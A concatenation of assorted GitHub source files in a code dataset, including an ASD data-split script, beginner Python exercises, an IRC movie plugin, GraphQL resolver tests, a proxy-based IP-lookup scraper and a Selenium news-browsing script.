index.append(j)\n if select_ID['SEX'].values[l]==1:\n genre.append(0) #ASD\n if select_ID['SEX'].values[l]==2:\n genre.append(1) #TC\n\n #ASD_train = math.ceil(0.7 * len(ASD))\n ASD_train = len(ASD[:3])\n #ASD_valid = math.ceil(0.2 * len(ASD))\n ASD_valid = len(ASD[3:6])\n #ASD_test = len(ASD) - ASD_train - ASD_valid\n ASD_test = len(ASD[6:9])\n \n ASDtrain_split, ASDtest_split, ASDvalid_split = torch.utils.data.random_split(ASD[:9], (ASD_train, ASD_test, ASD_valid))\n\n #ASD_train_annotations = math.ceil(0.7 * len(ASD_annotations))\n ASD_train_annotations = len(ASD_annotations[:3])\n #ASD_valid_annotations = math.ceil(0.2 * len(ASD_annotations))\n ASD_valid_annotations = len(ASD_annotations[3:6])\n #ASD_test_annotations = len(ASD_annotations) - ASD_train_annotations - ASD_valid_annotations\n ASD_test_annotations = len(ASD_annotations[6:9])\n ASDtrain_annot_split, ASDtest_annot_split, ASDvalid_annot_split = torch.utils.data.random_split(ASD_annotations[:9], (ASD_train_annotations, ASD_test_annotations, ASD_valid_annotations))\n \n #TC_train = int(0.7 * len(TC))\n TC_train = len(TC[:3])\n #TC_valid = int(0.2 * len(TC))\n TC_valid = len(TC[3:6])\n #TC_test = len(TC) - TC_train - TC_valid\n TC_test = len(TC[6:9])\n TCtrain_split, TCtest_split, TCvalid_split = torch.utils.data.random_split(TC[:9], (TC_train, TC_test, TC_valid))\n\n #TC_train_annotations = int(0.7 * len(TC_annotations))\n TC_train_annotations = len(TC_annotations[:3])\n #TC_valid_annotations = int(0.2 * len(TC_annotations))\n TC_valid_annotations = len(TC_annotations[3:6])\n #TC_test_annotations = len(TC_annotations) - TC_train_annotations - TC_valid_annotations\n TC_test_annotations = len(TC_annotations[6:9])\n TCtrain_annot_split, TCtest_annot_split, TCvalid_annot_split = torch.utils.data.random_split(TC_annotations[:9], (TC_train_annotations, TC_test_annotations, TC_valid_annotations))\n\n \n for i in ASDtrain_split:\n data_set['train'].append({ \n 'img':data_path_full[0][i]\n })\n for i in ASDtrain_annot_split:\n annot_data_set['train'].append({ \n 'annot':i\n })\n for i in TCtrain_split:\n data_set['train'].append({ \n 'img':data_path_full[0][i]\n })\n for i in TCtrain_annot_split:\n annot_data_set['train'].append({ \n 'annot':i\n })\n \n \n for i in ASDtest_split:\n data_set['test'].append({ \n 
'img':data_path_full[0][i]\n        })\n    for i in ASDtest_annot_split:\n        annot_data_set['test'].append({\n            'annot':i\n        })\n    for i in TCtest_split:\n        data_set['test'].append({\n            'img':data_path_full[0][i]\n        })\n    for i in TCtest_annot_split:\n        annot_data_set['test'].append({\n            'annot':i\n        })\n\n    for i in ASDvalid_split:\n        data_set['valid'].append({\n            'img':data_path_full[0][i]\n        })\n    for i in ASDvalid_annot_split:\n        annot_data_set['valid'].append({\n            'annot':i\n        })\n    for i in TCvalid_split:\n        data_set['valid'].append({\n            'img':data_path_full[0][i]\n        })\n    for i in TCvalid_annot_split:\n        annot_data_set['valid'].append({\n            'annot':i\n        })\n\n    with open('data_example_6.json', 'w') as fp:\n        json.dump(data_set, fp)\n\n    with open('annotation_example_6.json', 'w') as fp:\n        json.dump(annot_data_set, fp)\n    return data_set, annot_data_set\n\nrootDir = os.path.join('/media/disk1/user_home1/lvbellon/PROJECT/Outputs/cpac')\nfilename = r'/home/lvbellon/PROJECT/Phenotypic_V1_0b_preprocessed1.csv'\n\nsplits = data_split(rootDir, filename)  # renamed so the result no longer shadows the function\n","repo_name":"lvbellon/ASDNet","sub_path":"data_split.py","file_name":"data_split.py","file_ext":"py","file_size_in_byte":6065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"31404851848","text":"# Definition for singly-linked list.\r\n# class ListNode:\r\n#     def __init__(self, x):\r\n#         self.val = x\r\n#         self.next = None\r\n\r\nclass Solution:\r\n    def partition(self, head: ListNode, x: int) -> ListNode:\r\n        left_dummy = ListNode(-1)\r\n        right_dummy = ListNode(-1)\r\n\r\n        left_cur = left_dummy\r\n        right_cur = right_dummy\r\n        while head:\r\n            cur = head\r\n            if cur.val < x:\r\n                left_cur.next = cur\r\n                left_cur = cur\r\n            else:\r\n                right_cur.next = cur\r\n                right_cur = cur\r\n            head = head.next\r\n        left_cur.next = right_dummy.next\r\n        right_cur.next = None\r\n\r\n        return left_dummy.next","repo_name":"zhangleiray007/Leetcode-Python","sub_path":"86_Partition List.py","file_name":"86_Partition List.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
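One caveat on the split logic above, offered as a hedged aside rather than a fix to the repository: calling torch.utils.data.random_split separately on the indices and on the annotations draws two independent permutations, so images and labels can end up paired differently. A minimal stdlib sketch that shuffles (path, label) pairs once keeps them aligned; all names here are hypothetical.

import random

def paired_split(paths, labels, fracs=(0.7, 0.2, 0.1), seed=0):
    """Shuffle (path, label) pairs once, then cut train/valid/test so pairs stay aligned."""
    pairs = list(zip(paths, labels))
    random.Random(seed).shuffle(pairs)
    n_train = int(fracs[0] * len(pairs))
    n_valid = int(fracs[1] * len(pairs))
    train = pairs[:n_train]
    valid = pairs[n_train:n_train + n_valid]
    test = pairs[n_train + n_valid:]
    return train, valid, test

if __name__ == "__main__":
    paths = [f"sub-{i:03d}.nii.gz" for i in range(10)]  # hypothetical file names
    labels = [i % 2 for i in range(10)]                 # 0 = ASD, 1 = TC in the record's encoding
    train, valid, test = paired_split(paths, labels)
    print(len(train), len(valid), len(test))            # 7 2 1

{"seq_id":"22818022324","text":"month = int(input(\"Enter your birth month as a number: \"))\nday = int(input(\"Enter your birth day as a number: \"))\n\nzodiacSign = \"\"\n\nif (month == 12 and day >= 22) or (month == 1 and day <= 19):\n\tzodiacSign = \"Capricorno\"\n\nelif (month == 1 and day >= 20) or (month == 2 and day <= 18):\n\tzodiacSign = \"Acquario\"\n\nelif (month == 2 and day >= 19) or (month == 3 and day <= 20):\n\tzodiacSign = \"Pesci\"\n\nelif (month == 3 and day >= 21) or (month == 4 and day <= 19):\n\tzodiacSign = \"Ariete\"\n\nelif (month == 4 and day >= 20) or (month == 5 and day <= 20):\n\tzodiacSign = \"Toro\"\n\nelif (month == 5 and day >= 21) or (month == 6 and day <= 20):\n\tzodiacSign = \"Gemelli\"\n\nelif (month == 6 and day >= 21) or (month == 7 and day <= 22):\n\tzodiacSign = \"Cancro\"\n\nelif (month == 7 and day >= 23) or (month == 8 and day <= 22):\n\tzodiacSign = \"Leone\"\n\nelif (month == 8 and day >= 23) or (month == 9 and day <= 22):\n\tzodiacSign = \"Vergine\"\n\nelif (month == 9 and day >= 23) or (month == 10 and day <= 22):\n\tzodiacSign = \"Bilancia\"\n\nelif (month == 10 and day >= 23) or (month == 11 and day <= 21):\n\tzodiacSign = \"Scorpione\"\n\nelif (month == 11 and day >= 22) or (month == 12 and day <= 21):\n\tzodiacSign = 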
\"Sagittario\"\n\t\nprint(zodiacSign)\n\n","repo_name":"GdDev00/PythonWorkbook","sub_path":"Part Two/_47.py","file_name":"_47.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43166306747","text":"# TRP-3-22, Банницин Дмитрий\n\n# 1\n\nimport random\nprint(\"Дано целое число N (> 0). Найти квадрат данного числа, используя для\"\n \" его вычисления следующую формулу: N2 = 1 + 3 + 5 + … + (2*N - 1).\"\n \" После добавления к сумме каждого слагаемого выводить текущее\"\n \" значение суммы (в результате будут выведены квадраты всех целых\"\n \" чисел от 1 до N).\")\n\nN = int(input(\"N = \"))\nsum = 0\n\nfor n in range(1, N * 2, 2):\n sum += n\n print(sum)\n\n# 2\n\nprint(\"Дано целое число N (> 0). Найти значение выражения 1.1 – 1.2 + 1.3\"\n \" – … (N слагаемых, знаки чередуются). Условный оператор не\"\n \" использовать.\")\n\nN = int(input(\"N = \"))\nsum = 0\nk = -1\n\nfor n in range(1, N + 1, 1):\n k *= -1\n sum += k * (1 + n/10)\nprint(round(sum, 1))\n\n# 3\n\nprint(\"Дано целое число N (> 2). Последовательность целых чисел AK\"\n \"определяется следующим образом: A1 = 1, A2 = 2, A3 = 3, AK = AK–1 +\"\n \"AK–2 – 2·AK–3, K = 4, 5, … . Вывести элементы A1, A2, …, AN\")\n\ndef getAk(k):\n if k <= 3:\n return k\n else:\n return getAk(k-1) + getAk(k-2) - 2 * getAk(k-3)\n\nN = int(input(\"N = \"))\nprint(\"Answer: \")\nfor n in range(1, N + 1, 1):\n print(getAk(n))\n\n# 4\n\nprint(\"Даны целые положительные числа A и B (A < B). Вывести все целые числа\"\n \" от A до B включительно; при этом каждое число должно выводиться\"\n \" столько раз, каково его значение (например, число 3 выводится 3 раза).\")\n\nA = int(input(\"A = \"))\nB = int(input(\"B = \"))\nprint(\"Answer: \")\n\nfor n in range(A, B + 1, 1):\n for m in range(1, n+1, 1):\n print(n, end=\"\")\n print()\n\n# 5\n\nprint(\"Дано целое число N (> 0). Найти двойной факториал N: N!! = N·(N–\"\n \"2)·(N–4)·… (последний сомножитель равен 2, если N — четное, и 1,если\"\n \"N — нечетное).\")\n\nN = int(input(\"N = \"))\n\nprint(\"Answer: \")\n\nif N % 2 == 1:\n n = 1\nelse:\n n = 2\nans = 1\nwhile n <= N:\n ans *= n\n n += 2\nprint(ans)\n\n# 6\n\nprint(\"Дано число A (> 1). Вывести наибольшее из целых чисел K, для\"\n \" которых сумма 1 + 1/2 + … + 1/K будет меньше A, и саму эту сумму.\")\n\nA = int(input(\"A = \"))\n\nprint(\"Answer: \")\nsum = 0\nk = 1\nwhile sum < A:\n sum += 1/k\n k += 1\nprint(k-1, sum)\n\n# 7\n\nprint(\"Дано целое число N ( > 1). Последовательность чисел Фибоначчи FK\"\n \" определяется следующим образом: F1=1, F2=1, FK=FK–2 + FK–1, K=3,\"\n \" 4, … . Проверить, является ли число N числом Фибоначчи. Если\"\n \" является, то вывести True, если нет — вывести False.\")\n\nN = int(input(\"N = \"))\n\nf1 = 1\nf2 = 1\nf3 = 2\n\nprint(\"Answer: \")\n\nwhile f1 <= N:\n if f1 == N or f2 == N or f3 == N:\n print(True)\n quit()\n f1 = f2 + f3\n f2 = f3 + f1\n f3 = f1 + f2\nprint(False)\n\n# 8\n\nprint(\"Дано целое число N и набор из N вещественных чисел. Вывести в том\"\n \" же порядке округленные значения всех чисел из данного набора(как целые\"\n \" числа), а также сумму всех округленных значений.\")\n\nN = int(input(\"N = \"))\nk = 0\nsum = 0\nnumbers = []\nprint(\"Answer: \")\n\nk = 0\n\nwhile k < N:\n temp = int(random.uniform(1, 100))\n print(temp)\n sum += temp\n k += 1\nprint(\"sum = \", sum)\n\n# 9\n\nprint(\"Дано целое число N и набор из N целых чисел. 
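Exercise 7's triple-stepping Fibonacci update is correct but hard to verify at a glance. A more direct membership test, shown here as an illustrative alternative rather than a rewrite of the exercise:

def is_fibonacci(n: int) -> bool:
    """True if n appears in the sequence 1, 1, 2, 3, 5, 8, ... (for n >= 1)."""
    a, b = 1, 1
    while a < n:
        a, b = b, a + b
    return a == n

assert all(is_fibonacci(n) for n in (1, 2, 3, 5, 8, 13, 21))
assert not any(is_fibonacci(n) for n in (4, 6, 7, 9, 10))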
Вывести в том же\"\n \" порядке номера всех нечетных чисел из данного набора и количество K\"\n \" таких чисел.\")\n\nN = int(input(\"N = \"))\nk = 0\ncount = 0\nprint(\"Answer: \")\n\nk = 0\n\nwhile k < N:\n temp = random.randint(1, 100)\n if temp % 2 == 1:\n print(k)\n count += 1\n k += 1\nprint(\"count = \", count)\n\n# 10\n\nprint(\"Дано целое число N и набор из N целых чисел, упорядоченный по\"\n \" возрастанию. Данный набор может содержать одинаковые элементы.\"\n \" Вывести в том же порядке все различные элементы данного набора.\")\n\nN = int(input(\"N = \"))\nk = 0\nprint(\"Answer: \")\ncurrent = 99999\nk = 0\n\nwhile k < N:\n previous = current\n current = int(input(\"num = \"))\n if previous != current:\n print(current)\n k += 1\n\n# 11\n\nprint(\"Дано целое число N и набор из N целых чисел, содержащий по крайней\"\n \" мере два нуля. Вывести сумму чисел из данного набора,\"\n \" расположенных между последними двумя нулями(если последние\"\n \" нули идут подряд, то вывести 0).\")\n\nN = int(input(\"N = \"))\nk = 0\nsum = 0\ntempsum = 0\nk = 0\n\nwhile k < N:\n temp = int(input(\"num = \"))\n if temp == 0:\n sum = tempsum\n tempsum = 0\n tempsum += temp\n k += 1\n\nprint(\"Answer: \")\nprint(\"sum = \", sum)\n\n# 12\n\nprint(\"Даны целые числа K, N, а также K наборов целых чисел по N элементов\"\n \" в каждом наборе. Для каждого набора вывести номер его первого\"\n \" элемента, равного 2, или число 0, если в данном наборе нет двоек.\")\n\nN = int(input(\"N = \"))\nK = int(input(\"K = \"))\ni = 0\nj = 0\nprint(\"Answer: \")\n\nwhile i < K:\n while j < N:\n temp = random.randint(0, 100)\n if temp == 2:\n print(j)\n break\n elif j == N-1:\n print(0)\n j += 1\n i += 1\n j = 0\n\n# 13\n\nprint(\"Дано целое число N, а также K наборов ненулевых целых чисел.\"\n \" Признаком завершения каждого набора является число 0. Для каждого\"\n \" набора вывести количество его элементов. Вывести также общее\"\n \" количество элементов во всех наборах.\")\n\nK = int(input(\"K = \"))\ni = 0\nj = 0\nsum = 0\n\nwhile i < K:\n temp = int(input(\"num =\"))\n while temp != 0:\n temp = int(input(\"num =\"))\n j += 1\n sum += 1\n print(j)\n i += 1\n j = 0\n\nprint(sum)\n\n# 14\n\nprint(\"Дано целое число K, а также K наборов ненулевых целых чисел.\"\n \" Каждый набор содержит не менее двух элементов, признаком его\"\n \" завершения является число 0. Найти количество наборов, элементы\"\n \" которых возрастают.\")\n\nK = int(input(\"K = \"))\ni = 0\nj = 0\nflag = True\ncount = 0\n\nwhile i < K:\n temp = int(input(\"num =\"))\n while temp != 0:\n previous = temp\n temp = int(input(\"num =\"))\n if temp != 0 and temp < previous:\n flag = False\n j += 1\n if flag:\n count += 1\n flag = True\n i += 1\n j = 0\n\nprint(\"Answer: \", count)\n\n# 15\n\nprint(\"Дано целое число K, а также K наборов ненулевых целых чисел.\"\n \" Каждый набор содержит не менее двух элементов, признаком его\"\n \" завершения является число 0. 
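Exercise 11 above (the sum between the last two zeros) can also be done in a single pass without buffering, by resetting a running sum at every zero. A small sketch, independent of the exercise's input loop:

def sum_between_last_two_zeros(nums):
    """Sum of the elements strictly between the last two zeros; 0 if those zeros are adjacent."""
    total = running = 0
    seen_zero = False
    for x in nums:
        if x == 0:
            if seen_zero:
                total = running
            seen_zero = True
            running = 0
        else:
            running += x
    return total

assert sum_between_last_two_zeros([1, 0, 2, 3, 0, 4]) == 5
assert sum_between_last_two_zeros([0, 0, 7]) == 0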
Для каждого набора выполнить\"\n \" следующее действие: если элементы набора возрастают, то вывести 1\"\n \" если элементы набора убывают, то вывести –1\"\n \" если элементы набора\"\n \"не возрастают и не убывают, то вывести 0.\")\n\nK = int(input(\"K = \"))\ni = 0\nj = 0\nincrease = True\ndecrease = True\n\nwhile i < K:\n temp = int(input(\"num =\"))\n while temp != 0:\n previous = temp\n temp = int(input(\"num =\"))\n if temp != 0 and temp < previous:\n increase = False\n if temp > previous:\n decrease = False\n j += 1\n if increase:\n print(1)\n elif decrease:\n print(-1)\n else:\n print(0)\n increase = True\n decrease = True\n i += 1\n\n# 16\n\nprint(\"Дано целое число N ( > 2) и набор из N вещественных чисел. Набор\"\n \" называется пилообразным, если каждый его внутренний элемент либо\"\n \" больше, либо меньше обоих своих соседей(то есть является\"\n \" «зубцом»). Если данный набор является пилообразным, то вывести 0\"\n \"в противном случае вывести номер первого элемента, не являющегося\"\n \" зубцом.\")\n\npreprevious = 0\nprevious = 0\n\ni = 0\nN = int(input(\"N = \"))\nwhile i < N:\n if i > 0:\n preprevious = previous\n previous = temp\n temp = float(input(\"num = \"))\n if i > 1:\n if not (previous < preprevious and previous < temp or previous > preprevious and previous > temp):\n print(\"Answer: \", i)\n quit()\n i += 1\n\nprint(\"Answer: \", 0)","repo_name":"MY5T3RI0/APSH","sub_path":"ТРП-3-22_Банницин_4.py","file_name":"ТРП-3-22_Банницин_4.py","file_ext":"py","file_size_in_byte":10195,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70420047732","text":"import sopel\nimport tmdbsimple as tmdb\n\n@sopel.module.commands('movie')\ndef tmdb_command(bot, trigger):\n movie_title = trigger.group(2)\n\n tmdb.API_KEY = 'API_KEY'\n search = tmdb.Search()\n response = search.movie(query=movie_title)\n\n try:\n result = response['results'][0]\n tmdb_id = result['id']\n url = f'https://www.2embed.to/embed/tmdb/movie?id={tmdb_id}'\n \n bot.say(url)\n except IndexError:\n bot.say(\"Sorry, nothing found.\")\n","repo_name":"klppl/sopel-modules","sub_path":"movies.py","file_name":"movies.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"23154051650","text":"import sys\nimport os\nfrom os.path import dirname, join, expanduser, normpath, realpath\n\nimport pytest\nfrom graphene.test import Client\n\nfrom unittest import TestCase\n\nfrom manage import seed, remove_seed\n\nseed()\nfrom app import app\nfrom db import db\nfrom models import Sectors, Groups\nfrom queries import schema\n\nremove_seed()\n\n# This is the only way I could get imports to work for unit testing.\nPACKAGE_PARENT = '..'\nSCRIPT_DIR = dirname(realpath(join(os.getcwd(), expanduser(__file__))))\nsys.path.append(normpath(join(SCRIPT_DIR, PACKAGE_PARENT)))\n\n@pytest.fixture(scope='class')\ndef group_test_db_init():\n db.init_app(app)\n with app.app_context():\n sector = Sectors(\n id=1,\n zone=\"GC\",\n sector=\"GC_A\",\n description=\"Arts\"\n )\n db.session.add(sector)\n\n sector = Sectors(\n id=2,\n zone=\"GC\",\n sector=\"GC_BF\",\n description=\"Banking and Finance\"\n )\n db.session.add(sector)\n\n sector = Sectors(\n id=25,\n zone=\"TEST\",\n sector=\"TEST_DEV\",\n description=\"Development test cases\"\n )\n db.session.add(sector)\n db.session.commit()\n group = Groups(\n id=1,\n s_group='GC_A',\n description='Arts',\n sector_id=1\n )\n 
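The sopel plugin above raises a TypeError when the command arrives with no title, because trigger.group(2) is then None. A hedged variant with a guard and the key read from the environment; it links to TMDB itself, and the environment variable name is illustrative, not part of the repository.

import os
import sopel
import tmdbsimple as tmdb

@sopel.module.commands('movie')
def tmdb_command(bot, trigger):
    query = trigger.group(2)
    if not query:
        bot.say("Usage: .movie <title>")
        return
    tmdb.API_KEY = os.environ.get("TMDB_API_KEY", "")
    try:
        results = tmdb.Search().movie(query=query)['results']
        bot.say(f"https://www.themoviedb.org/movie/{results[0]['id']}")
    except (IndexError, KeyError):
        bot.say("Sorry, nothing found.")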
db.session.add(group)\n\n group = Groups(\n id=2,\n s_group='GC_BF',\n description='Banking and Finance',\n sector_id=2\n )\n db.session.add(group)\n\n yield\n\n with app.app_context():\n Groups.query.delete()\n Sectors.query.delete()\n db.session.commit()\n\n@pytest.mark.usefixtures('group_test_db_init')\nclass TestGroupResolver(TestCase):\n def test_get_group_resolvers_by_id(self):\n \"\"\"Test get_group_by_id resolver\"\"\"\n with app.app_context():\n client = Client(schema)\n query = \"\"\"\n {\n getGroupById(id:1) {\n sGroup,\n description\n }\n }\"\"\"\n result_refr = {\n \"data\": {\n \"getGroupById\": [\n {\n \"sGroup\": \"GC_A\",\n \"description\": \"Arts\"\n }\n ]\n }\n }\n\n result_eval = client.execute(query)\n self.assertDictEqual(result_refr, result_eval)\n\n def test_get_group_resolvers_by_group(self):\n \"\"\"\"Test get_group_by_group resolver\"\"\"\n with app.app_context():\n client = Client(schema)\n query = \"\"\"\n {\n getGroupByGroup(group: GC_A){\n description\n sectorId\n }\n }\"\"\"\n result_refr = {\n \"data\": {\n \"getGroupByGroup\": [\n {\n \"description\": \"Arts\",\n \"sectorId\": 1\n }\n ]\n }\n }\n\n result_eval = client.execute(query)\n self.assertDictEqual(result_refr, result_eval)\n\n def test_get_group_resolvers_by_sector(self):\n \"\"\"Test get_group_by_sector_id resolver\"\"\"\n with app.app_context():\n client = Client(schema)\n query = \"\"\"\n {\n getGroupBySector(sector: GC_A){\n description\n groupSector{\n id\n zone\n description\n }\n }\n }\"\"\"\n result_refr = {\n \"data\": {\n \"getGroupBySector\": [\n {\n \"description\": \"Arts\",\n \"groupSector\": {\n \"id\": \"U2VjdG9yczox\",\n \"zone\": \"GC\",\n \"description\": \"Arts\"\n }\n }\n ]\n }\n }\n\n result_eval = client.execute(query)\n self.assertDictEqual(result_refr, result_eval)\n\n def test_group_resolver_by_id_invalid(self):\n \"\"\"Test get_group_by_id invalid ID error handling\"\"\"\n with app.app_context():\n client = Client(schema)\n query = \"\"\"\n {\n getGroupById(id: 9999){\n id\n description\n sectorId\n }\n }\"\"\"\n executed = client.execute(query)\n\n assert executed['errors']\n assert executed['errors'][0]\n assert executed['errors'][0]['message'] == \"Error, Invalid ID\"\n\n def test_group_resolver_by_group_invalid(self):\n \"\"\"Test get_group_by_group invalid sector error handling\"\"\"\n with app.app_context():\n client = Client(schema)\n query = \"\"\"\n {\n getGroupByGroup(group: fds){\n id\n description\n sectorId\n }\n }\"\"\"\n executed = client.execute(query)\n\n assert executed['errors']\n assert executed['errors'][0]\n assert executed['errors'][0][\n 'message'] == f'Argument \"group\" has invalid value fds.\\nExpected type \"GroupEnums\", found fds.'\n\n def test_group_resolver_by_sector_invalid(self):\n \"\"\"Test get_group_by_sector invalid Zone error handling\"\"\"\n with app.app_context():\n client = Client(schema)\n query = \"\"\"\n {\n getGroupBySector(sector: dsa){\n id\n description\n sectorId\n }\n }\"\"\"\n executed = client.execute(query)\n\n assert executed['errors']\n assert executed['errors'][0]\n assert executed['errors'][0][\n 'message'] == f'Argument \"sector\" has invalid value dsa.\\nExpected type \"SectorEnums\", found dsa.'\n","repo_name":"naeemhaq/tracker","sub_path":"api/tests/test_groups_resolver.py","file_name":"test_groups_resolver.py","file_ext":"py","file_size_in_byte":6206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"10288642545","text":"#!/usr/bin/env python3\n# -*- coding: 
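The resolver tests above all follow one pattern: build a graphene test Client around the schema and compare execute() output against a reference dict. A self-contained miniature of that pattern, with a toy schema instead of the project's database-backed one:

import graphene
from graphene.test import Client

class Query(graphene.ObjectType):
    group = graphene.String(id=graphene.Int(required=True))

    def resolve_group(root, info, id):
        return {1: "GC_A", 2: "GC_BF"}.get(id)

schema = graphene.Schema(query=Query)

def test_group_by_id():
    result = Client(schema).execute('{ group(id: 1) }')
    assert result == {"data": {"group": "GC_A"}}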
utf-8 -*-\n\"\"\"\nInstall lxml before running using `pip install lxml`\n\n\"\"\"\n# Import necessary modules\nimport requests\nimport io\nimport csv\nimport random\nimport time\nfrom datetime import datetime\nfrom lxml import html\n\n\n\n# For collect and set proxies\nproxies = requests.get('https://www.proxy-list.download/api/v1/get?type=http')\n\nproxies = proxies.text.split('\\r\\n')\n\n\n\nhttp_proxy = random.choice(proxies)\nproxyDict = { \n \"http\" : 'http://' + http_proxy, \n \"https\" : 'http://' + http_proxy, \n\n }\n\n\n\n# Import APP ID's\nIMPORT_FILE_NAME = 'input.csv'\nips = []\nwith open(IMPORT_FILE_NAME, 'r') as csvFile:\n reader = csv.reader(csvFile)\n for row in reader:\n ips.append(row[0])\nprint('Total ip imported: ' + str(len(ips)))\n\n\n# Custom Header\nheaders = {'user-agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0',\n 'Accept': 'application/json, text/javascript, */*; q=0.01',\n 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',\n 'X-Requested-With': 'XMLHttpRequest'}\n\n# Base URL(For creating session and extracting cookie)\nurl = 'https://www.whatismyip.com/ip-address-lookup/?iref=navbar'\n\n# Search or POST URL\nsearch_url = 'https://www.whatismyip.com/custom/response.php'\n\n# Creating Session\nsession = requests.Session()\n\n# Doing BASE GET requests\nr = session.get(url, headers=headers, proxies=proxyDict)\n\n\n\n\n# Here data points will be store\nip_list = []\ncountry_list = []\nstate_list = []\npostal_list = []\nisp_list = []\n\nfor i, ip_ in enumerate(ips):\n \n try:\n # Basic Clean up (Removing \\n and space)\n ip_ = str(ip_).replace('\\n','').replace(' ','')\n \n # Making paramas\n data = dict(ip=ip_, action='ip-lookup')\n \n # Extracting cookes\n __cfduid = r.cookies.get_dict()['__cfduid']\n __cfduid = '__cfduid=' + __cfduid\n \n dwqa_anonymous = r.cookies.get_dict()['dwqa_anonymous']\n dwqa_anonymous = 'dwqa_anonymous=' + dwqa_anonymous\n cookie_data = __cfduid + '; ' + dwqa_anonymous\n \n cookie_data = dict(Cookie=cookie_data)\n \n # Finalize header(merge)\n headers = {**headers, **cookie_data}\n \n # POST requests data\n r2 = session.post(search_url, data=data, headers=headers, proxies=proxyDict)\n \n # Making LXML object\n root = html.fromstring(r2.content)\n \n \n # Country Code\n country_list.append(root.xpath('div[1]/div[2]/table/tbody/tr[6]/td[2]')[0].text)\n \n # State\n if root.xpath('div[1]/div[2]/table/tbody/tr[4]/td[2]')[0].text == '-':\n state_list.append(root.xpath('div[1]/div[1]/table/tbody/tr[4]/td[2]')[0].text)\n else:\n state_list.append(root.xpath('div[1]/div[2]/table/tbody/tr[4]/td[2]')[0].text)\n \n \n # ISP provider\n if root.xpath('div[1]/div[2]/table/tbody/tr[10]/td[2]')[0].text == '-':\n isp_list.append(root.xpath('div[1]/div[1]/table/tbody/tr[10]/td[2]')[0].text)\n else:\n isp_list.append(root.xpath('div[1]/div[2]/table/tbody/tr[10]/td[2]')[0].text)\n \n \n # Postal\n if root.xpath('div[1]/div[2]/table/tbody/tr[8]/td[2]')[0].text == '-':\n postal_list.append(root.xpath('div[1]/div[1]/table/tbody/tr[8]/td[2]')[0].text)\n else:\n postal_list.append(root.xpath('div[1]/div[2]/table/tbody/tr[8]/td[2]')[0].text)\n \n ip_list.append(ip_)\n \n \n print('Left: ' + str(len(ips)-i))\n # Random sleep for not putting pressure on server\n time.sleep(random.random())\n \n except Exception as e: \n print('Error: ' + str(e))\n print('id :' + str(ip_))\n pass\n \n\n# Zip data \ndata = [[a,b,c,d] for a,b,c,d in zip(ip_list, country_list, state_list, isp_list)]\n \n# Export to CSV 
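The lookup loop above sends every request through a single randomly chosen proxy with no timeout, so one dead proxy can stall the whole run. A hedged sketch of a hardened session using the standard requests/urllib3 retry machinery; the numbers are illustrative defaults, not tuned values.

import requests
from requests.adapters import HTTPAdapter
from urllib3.util.retry import Retry

def make_session(total_retries: int = 3) -> requests.Session:
    """Session that retries transient failures with exponential backoff."""
    retry = Retry(total=total_retries, backoff_factor=0.5,
                  status_forcelist=(429, 500, 502, 503, 504))
    session = requests.Session()
    session.mount("http://", HTTPAdapter(max_retries=retry))
    session.mount("https://", HTTPAdapter(max_retries=retry))
    return session

# Usage: always pass a timeout so a dead proxy cannot hang forever.
# r = make_session().post(search_url, data=data, headers=headers, timeout=10)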
\nEXPORT_FILE_NAME = 'output-' + \"{:%Y_%m_%d_%M_%S}\".format(datetime.now()) + '.csv' \nwith open(EXPORT_FILE_NAME, \"w\") as output:\n writer = csv.writer(output, lineterminator='\\n')\n writer.writerows(data)\n\nprint(EXPORT_FILE_NAME + ' saved successfully.')\n\n \n \n \n \n \n","repo_name":"krypted/csviplookup","sub_path":"iplookup.py","file_name":"iplookup.py","file_ext":"py","file_size_in_byte":4261,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"74067908853","text":"import logging\nimport pickle\nfrom datetime import datetime\nfrom random import randint\nfrom time import sleep\n\nfrom app.db.db import new_session\nfrom app.db.models import Cookies, Profile\nfrom selenium import webdriver\nfrom selenium.common import InvalidCookieDomainException, TimeoutException\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom sqlalchemy.orm import Session\n\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\n\nclass NewsViewer:\n model_cls = Cookies\n base_url = \"https://news.google.com/\"\n\n def __init__(self, url: str, num: int):\n self.driver = None\n self.record = None\n self.domain = \"\"\n self.url = url\n self.num = num\n\n def load(self) -> str:\n with new_session() as session:\n self.record = session.query(Profile).filter(Profile.id == self.num).one()\n self.navigation(session)\n return f\"For profile {self.num} loaded news from {self.domain}\"\n\n def get_cookies(self, session: Session) -> list[dict]:\n cookies = (\n session.query(Cookies).filter(Cookies.profile_id == self.num).filter(Cookies.domain == self.domain).all()\n )\n if cookies:\n return pickle.loads(cookies[0].cookie)\n return []\n\n def add_cookies(self, cookie: list[dict]) -> None:\n for item in cookie:\n try:\n self.driver.add_cookie(item)\n except InvalidCookieDomainException as e:\n print(f\"{self.domain}\\n{e}\")\n\n def get_domain(self, url: str) -> None:\n self.driver.get(url)\n self.domain = self.driver.current_url.split(\"/\")[2]\n\n def navigation(self, session: Session) -> None:\n url = self.base_url + self.url.lstrip(\"./\")\n options = webdriver.ChromeOptions()\n options.add_argument(\"disable_infobars\")\n options.add_argument(\"headless\")\n options.add_argument(\"window-size=1920x935\")\n options.add_argument(\"--kiosk\")\n options.add_argument(\"--log-level=3\")\n try:\n self.driver = webdriver.Chrome(chrome_options=options)\n self.get_domain(url)\n cookie = self.get_cookies(session)\n self.add_cookies(cookie)\n self.driver.get(url)\n self.news_viewer()\n self.update_cookies(session)\n finally:\n self.driver.close()\n\n def news_viewer(self) -> None:\n scroll_position = 0\n self.driver.implicitly_wait(15)\n try:\n 